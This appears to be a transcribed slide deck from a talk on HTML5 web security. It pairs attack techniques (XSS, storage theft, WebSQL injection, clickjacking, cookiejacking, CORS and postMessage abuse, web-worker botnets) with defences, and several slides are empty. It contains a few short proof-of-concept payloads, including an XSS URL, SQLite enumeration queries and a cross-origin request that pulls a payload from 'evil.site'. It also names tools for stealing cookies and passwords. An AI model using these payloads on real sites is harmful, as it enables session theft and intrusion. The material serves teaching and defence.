talk about html5 security
DESCRIPTION
Talk about html5 securityTRANSCRIPT
![Page 1: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/1.jpg)
youstar@insight-labs
![Page 2: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/2.jpg)
Introduction to HTML5
HTML5 threat model
Vulnerabilities & Defense
Tools
Reference
![Page 3: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/3.jpg)
History HTML1.0——1993.6 Not Standard
HTML 2.0——1995.11 RFC 1866
HTML 3.2——1996.1.14 W3C Recommended Standard
HTML 4.0——1997.12.18 W3C Recommended Standard
HTML 4.01——1999.12.24 W3C Recommended Standard
XHTML——2000.1.20 W3C Recommended Standard
HTML5——2008 First Draft Standard
2012 W3C Candidate Recommendation
![Page 4: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/4.jpg)
Features
The three aspects of HTML5
Content HTML New Tags and Attributes
Presentation of content CSS
Interaction with content JavaScript Add New API Drag LocalStorage WebWorkers etc
![Page 5: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/5.jpg)
Features
![Page 6: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/6.jpg)
![Page 7: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/7.jpg)
![Page 8: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/8.jpg)
XSS abuse with tags and attributes
Hiding URL Code
Stealing from the storage
Injecting and Exploiting WebSQL
ClickJacking &&CookieJacking
Cross Origin Request and postMessage
Client‐side File Includes
Botnet and widgets
![Page 9: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/9.jpg)
In: New tags: <button>,<video>,<audio>,<article>,<footer>,<nav> New attributes for tags: autocomplete, autofocus, pattern(yes,regex) for
input New media events New <canvas> tag for 2D rendering New form controls for date and time Geolocation New selectors Client-side storage including localStorage, sessionStorage, and WebSQL
Out: Presentation elements such a <font>, <center> Presentation attributes including align, border <frame>,<frameset> <applet> Old special effects: <marquee>,<bgsound> <noscript>
![Page 10: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/10.jpg)
Attack:
New XSS Vector
Bypass Black-list Filter
Defense:
Add new tags to Black-list
Change Regex
![Page 11: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/11.jpg)
![Page 12: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/12.jpg)
DOM window.history.back();
window.history.forward();
window.history.go(); HTML5 history.pushState() history.pushState(state object,title,URL);
history.replaceState() The same with pushState,but modifies the current
history entry.
![Page 13: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/13.jpg)
http://127.0.0.1/html5/poc/history/xsspoc.php?xss=<script>history.pushState(,'',location.href.split("?").shift());document.write(1)</script>
http://127.0.0.1/html5/poc/history/xsspoc.php
![Page 14: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/14.jpg)
![Page 15: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/15.jpg)
Type LocalStorage:for long-term storage
SessionStorage:for the session application(last when the browser closed)
Differences Cookies:4k
LocalStorage/ SessionStorage:depends on browser(usually 5MB)
Support Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera
10.50
![Page 16: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/16.jpg)
![Page 17: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/17.jpg)
Function (localStorage | sessionStorage).setItem()
(localStorage | sessionStorage).getItem()
(localStorage | sessionStorage).deleteItem()
(localStorage | sessionStorage).clear()
![Page 18: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/18.jpg)
Attack
Get the data from the storage(cookie,passwd,etc)
Storage your xss shellcode
Unlimit the path
Defense
Don’t store sensitive data in local storage
Don't use local storage for session identifiers
Stick with cookies and use the HTTPOnly and Secure flags
![Page 19: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/19.jpg)
![Page 20: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/20.jpg)
Database Storage
The same as the Google Gears
Operate openDatabase("Database Name", "Database Version", "Database
Description", "Estimated Size");
transaction("YOUR SQL STATEMENT HERE");
executeSql();
Type
SQLite (support by WebKit)
![Page 21: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/21.jpg)
Attack
Store shellcode
SQL inject
Defense
Strick with the sql operate
Encode the sql result before display
Don’t store sensitive data
![Page 22: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/22.jpg)
Store shellcode
![Page 23: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/23.jpg)
SQL Injection Use sqlite_master SELECT name FROM sqlite_master WHERE type='table'
SELECT sql FROM sqlite_master WHERE name='table_name'
SELECT sqlite_version()
Select with ? executeSql("SELECT name FROM stud WHERE id=" +
input_id); False
executeSql("SELECT name FROM stud WHERE id=?", [input_id]); True
![Page 24: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/24.jpg)
Drag and drop basics Drag Data the drag feedback image drag effects
Drag events: dragstart dragenter dragover dragleave drag drop dragend
![Page 25: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/25.jpg)
![Page 26: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/26.jpg)
ClickJacking
XSS + Drag
![Page 27: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/27.jpg)
![Page 28: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/28.jpg)
CookieJacking
Use many technology to steal user’s local cookies
Technology
How to read the local fileiframe+file://
How to detect the state of cookies Clickjacking
How to send cookiesSMB
![Page 29: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/29.jpg)
![Page 30: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/30.jpg)
Defense
Use iframe with sandbox
If (top !== window) top.location= window.location.href;
if (top!=self) top.location.href=self.location.href
![Page 31: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/31.jpg)
postMessage
Send
otherWindow.postMessage(message, targetOrigin);
Receive
window.addEventListener("message", receiveMessage, false);
function receiveMessage(event)
if (event.origin !== "http://example.org:8080")
return;
// ...
![Page 32: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/32.jpg)
![Page 33: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/33.jpg)
Defense
Check the postMessage origin
Don’t use innerHTML
Element.innerHTML=e.data;//danger
Element.textContent=e.data;//safe
Don’t use Eval to deal with the mesage
![Page 34: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/34.jpg)
Cross-Origin Resource Sharing
Originally Ajax calls were subject to Same Origin Policy
Site A cannot make XMLHttpRequests to Site B
HTML5 makes it possible to make these cross domain calls
Site ASite B(Response must include a header)
Access-Control-Allow-Origin: Site A Must
Access-Control-Allow-Credentials: true | false
Access-Control-Expose-Headers:
etc
![Page 35: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/35.jpg)
![Page 36: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/36.jpg)
![Page 37: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/37.jpg)
Defense
Don’t set this: Access-Control-Allow-Origin: *
(Flash crossdomain.xml )
Prevent DDOS
if(origin=="Site A")header(Access-Control-Allow-Origin:Site A)……//process request
![Page 38: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/38.jpg)
Code like this: <html><body><script>
x = new XMLHttpRequest();
x.open("GET",location.hash.substring(1));
x.onreadystatechange=function()if(x.readyState==4)
document.getElementById("main").innerHTML=x.responseText;
x.send();
</script>
<div id=“main”></div>
</body></html>
POC
Introducing Cross Origin Requests http://example.com/#http://evil.site/payload.php
VContents of ‘payload.php’ will be included as HTML within <div id=“main”></div>
New type of XSS!!
![Page 39: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/39.jpg)
![Page 40: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/40.jpg)
Web Workers
running scripts in the background independently
Very simple var w = new Worker("some_script.js");
w.onmessage = function(e) // do something ;
w.terminate()
Access XHR,navigator object,application cache,spawn other workers!
Can’t access
DOM,window,document objects
![Page 41: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/41.jpg)
Attack
Botnet
Application‐level DDoS attacks
Email Spam
Distributed password cracking
Network Scanning
Guessing User’s Private IP Address
Identify the user’s subnet
Identify the IP address
![Page 42: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/42.jpg)
COR+XSS+Workers=shell of the future
![Page 43: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/43.jpg)
HTML5CSdump
enumeration and extraction techniques described before to obtain all the client-side storage relative to a certain domain name
JS-Recon
Port Scans
Network Scans
Detecting private IP address
![Page 44: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/44.jpg)
Imposter Steal cookies
Set cookies
Steal Local Shared Objects
Steal stored passwords from FireFox
etc Shell of the Future Reverse Web Shell handler
Bypass anti-session hijacking measures
![Page 45: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/45.jpg)
Ravan
JavaScript based Distributed Computing system
hashing algorithms
MD5
SHA1
SHA256
SHA512
![Page 46: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/46.jpg)
HTML5 带来的新安全威胁:xisigr Attacking with HTML5:lavakumark Abusing HTML5:Ming Chow HTML5 Web Security:Thomas Röthlisberger Abusing HTML 5 Structured Client-side Storage:Alberto Trivero
Cookiejacking:Rosario Valotta http://heideri.ch/jso/#html5 http://www.wooyun.org/bugs/wooyun-2011-02351 http://shreeraj.blogspot.com/2011/03/html-5-xhr-l2-and-
dom-l3-top-10-attacks.html http://www.html5test.com
![Page 47: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/47.jpg)
http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe.html
http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox http://code.google.com/intl/zh-CN/apis/gears/api_database.html http://michael-coates.blogspot.com/2010/07/html5-local-storage-
and-xss.html http://www.w3.org/TR/access-control/ http://m-austin.com/blog/?p=19 https://developer.mozilla.org/en/ http://www.w3.org/TR/cors/ http://www.andlabs.org/tools/ravan.html http://www.gnucitizen.org/blog/client-side-sql-injection-attacks/